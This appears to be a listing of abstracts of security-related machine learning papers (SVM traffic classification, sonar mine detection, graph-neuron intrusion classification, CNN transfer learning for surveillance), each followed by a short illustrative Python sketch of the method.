Network traffic identification has been a hot topic in the network security area. Identifying abnormal traffic can detect attack traffic and helps network managers enforce the corresponding security policies to prevent attacks. Support Vector Machines (SVMs) are one of the most promising supervised machine learning (ML) algorithms that can be applied to the identification of traffic in IP networks as well as the detection of abnormal traffic. SVMs show good performance because they avoid the local-optimum problems that exist in many supervised learning algorithms. However, as a binary classification approach, SVM needs more research for multiclass classification. In this paper, we propose an abnormal traffic identification system (ATIS) that can classify and identify multiple attack traffic applications. Each component of ATIS is introduced in detail, and experiments are carried out based on ATIS. In tests on the KDD CUP dataset, the SVM shows good performance. Furthermore, a comparison of experiments reveals that scaling and parameter choice have a vital impact on SVM training results.
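The paper's observation that scaling and parameters strongly affect SVM results corresponds to the standard pipeline sketched below; the synthetic features stand in for KDD CUP data and the grid values are assumptions.

```python
# Scale features first, then grid-search the SVM's C and gamma.
from sklearn.datasets import make_classification
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC

X, y = make_classification(n_samples=600, n_features=20, n_classes=3,
                           n_informative=6, random_state=0)

pipe = make_pipeline(StandardScaler(), SVC())   # scaling first, then RBF-SVM
grid = GridSearchCV(pipe, {"svc__C": [0.1, 1, 10],
                           "svc__gamma": ["scale", 0.01, 0.1]}, cv=3)
grid.fit(X, y)
print(grid.best_params_, round(grid.best_score_, 3))
```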

2018-04-11
Gebhardt, D., Parikh, K., Dzieciuch, I., Walton, M., Hoang, N. A. V.  2017.  Hunting for Naval Mines with Deep Neural Networks. OCEANS 2017 - Anchorage. :1–5.

Explosive naval mines pose a threat to ocean- and sea-faring vessels, both military and civilian. This work applies deep neural network (DNN) methods to the problem of detecting mine-like objects (MLOs) on the seafloor in side-scan sonar imagery. We explored how DNN depth, memory requirements, calculation requirements, and training data distribution affect detection efficacy. A visualization technique (class activation map) was incorporated to aid a user in interpreting the model's behavior. We found that modest DNN model sizes yielded better accuracy (98%) than very simple DNN models (93%) and a support vector machine (78%). The largest DNN models achieved a <1% efficacy increase at the cost of a 17x increase in trainable parameter count and computation requirements. In contrast to the DNNs popularized for many-class image recognition tasks, the models for this task require far fewer computational resources (0.3% of the parameters) and are suitable for embedded use within an autonomous unmanned underwater vehicle.
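The class activation map mentioned in the abstract can be sketched for any CNN that ends in global average pooling: weight the final convolutional feature maps by the classifier weights of the predicted class. The tiny network below is illustrative, not the authors' mine detector.

```python
# Class activation map (CAM): CAM_c(h, w) = sum_k w_{c,k} * fmap_k(h, w)
import torch
import torch.nn as nn

class TinyGapCNN(nn.Module):
    def __init__(self, n_classes=2):
        super().__init__()
        self.features = nn.Sequential(
            nn.Conv2d(1, 16, 3, padding=1), nn.ReLU(),
            nn.Conv2d(16, 32, 3, padding=1), nn.ReLU())
        self.fc = nn.Linear(32, n_classes)  # applied after global avg pooling

    def forward(self, x):
        fmap = self.features(x)                   # (B, 32, H, W)
        logits = self.fc(fmap.mean(dim=(2, 3)))   # GAP then linear
        return logits, fmap

model = TinyGapCNN()
x = torch.randn(1, 1, 64, 64)                     # a sonar patch stand-in
logits, fmap = model(x)
cls = logits.argmax(dim=1).item()

cam = torch.einsum("k,khw->hw", model.fc.weight[cls], fmap[0])
print(cam.shape)                                  # (64, 64) heat map
```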

2018-04-02
Essra, A., Sitompul, O. S., Nasution, B. Benyamin, Rahmat, R. F.  2017.  Hierarchical Graph Neuron Scheme in Classifying Intrusion Attack. 2017 4th International Conference on Computer Applications and Information Processing Technology (CAIPT). :1–6.

Hierarchical Graph Neuron (HGN) is an extension of a network-centric algorithm called Graph Neuron (GN), which is used to perform parallel distributed pattern recognition. In this research, the HGN scheme is used to classify intrusion attacks in computer networks. Patterns of intrusion attacks are preprocessed in three steps: selecting attributes using information-gain attribute evaluation, discretizing the selected attributes using a supervised entropy-based discretization method, and selecting the training data using the K-Means clustering algorithm. After the preprocessing stage, the HGN scheme is deployed to classify intrusion attacks using the KDD Cup 99 dataset. The classification results are measured in terms of accuracy rate, detection rate, false positive rate, and true negative rate. The test results show that the HGN scheme is promising and stable in classifying intrusion attack patterns, with an accuracy rate of 96.27%, a detection rate of 99.20%, a true negative rate below 15.73%, and a false positive rate as low as 0.80%.
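A sketch of the three preprocessing steps with common scikit-learn stand-ins (mutual information for information gain, quantile binning in place of entropy-based discretization); the HGN classifier itself is not reproduced.

```python
# Attribute selection, discretization, and K-Means training-data selection.
import numpy as np
from sklearn.cluster import KMeans
from sklearn.datasets import make_classification
from sklearn.feature_selection import mutual_info_classif
from sklearn.preprocessing import KBinsDiscretizer

X, y = make_classification(n_samples=1000, n_features=30, random_state=0)

# 1) Information gain == mutual information for attribute selection.
gain = mutual_info_classif(X, y, random_state=0)
keep = np.argsort(gain)[::-1][:10]
X_sel = X[:, keep]

# 2) Discretize selected attributes (entropy-based in the paper; a
#    quantile binning stands in here).
X_disc = KBinsDiscretizer(n_bins=5, encode="ordinal").fit_transform(X_sel)

# 3) Pick training rows closest to K-Means centroids as representatives.
km = KMeans(n_clusters=20, n_init=10, random_state=0).fit(X_disc)
reps = [np.argmin(np.linalg.norm(X_disc - c, axis=1))
        for c in km.cluster_centers_]
print("representative row indices:", sorted(reps))
```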

2018-02-14
Stubbs, J. J., Birch, G. C., Woo, B. L., Kouhestani, C. G.  2017.  Physical security assessment with convolutional neural network transfer learning. 2017 International Carnahan Conference on Security Technology (ICCST). :1–6.

Deep learning techniques have demonstrated the ability to perform a variety of object recognition tasks using visible imager data; however, deep learning has not been implemented as a means to autonomously detect and assess targets of interest in a physical security system. We demonstrate the use of transfer learning on a convolutional neural network (CNN) to significantly reduce training time while keeping detection accuracy high for targets relevant to physical security. Unlike many detection algorithms employed by video analytics within physical security systems, this method does not rely on temporal data to construct a background scene; targets of interest can halt motion indefinitely and still be detected by the implemented CNN. A key advantage of using deep learning is the ability of a network to improve over time: periodic retraining can lead to better detection and higher confidence rates. We investigate training data size versus CNN test accuracy using physical security video data. Due to the large number of visible imagers, the significant volume of data collected daily, and the currently deployed human-in-the-loop ground truth data, physical security systems present a unique environment that is well suited for analysis via CNNs. This could lead to an algorithmic element that reduces the human burden and decreases the number of human-analyzed nuisance alarms.
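
The transfer-learning recipe described here is the standard freeze-the-backbone pattern, sketched below; the ResNet-18 backbone, the three target classes, and the hyperparameters are assumptions, not the paper's configuration.

```python
# Freeze a pretrained CNN backbone and retrain only a small head, which
# is what cuts training time in the transfer-learning setting.
import torch
import torch.nn as nn
from torchvision import models

backbone = models.resnet18(weights="IMAGENET1K_V1")
for p in backbone.parameters():
    p.requires_grad = False                  # keep pretrained features fixed

# Replace the classifier head for, e.g., {background, person, vehicle}.
backbone.fc = nn.Linear(backbone.fc.in_features, 3)

# Only the new head is optimized.
optimizer = torch.optim.Adam(backbone.fc.parameters(), lr=1e-3)
criterion = nn.CrossEntropyLoss()

x = torch.randn(4, 3, 224, 224)              # a dummy batch of frames
loss = criterion(backbone(x), torch.tensor([0, 1, 2, 0]))
loss.backward()
optimizer.step()
print(float(loss))
```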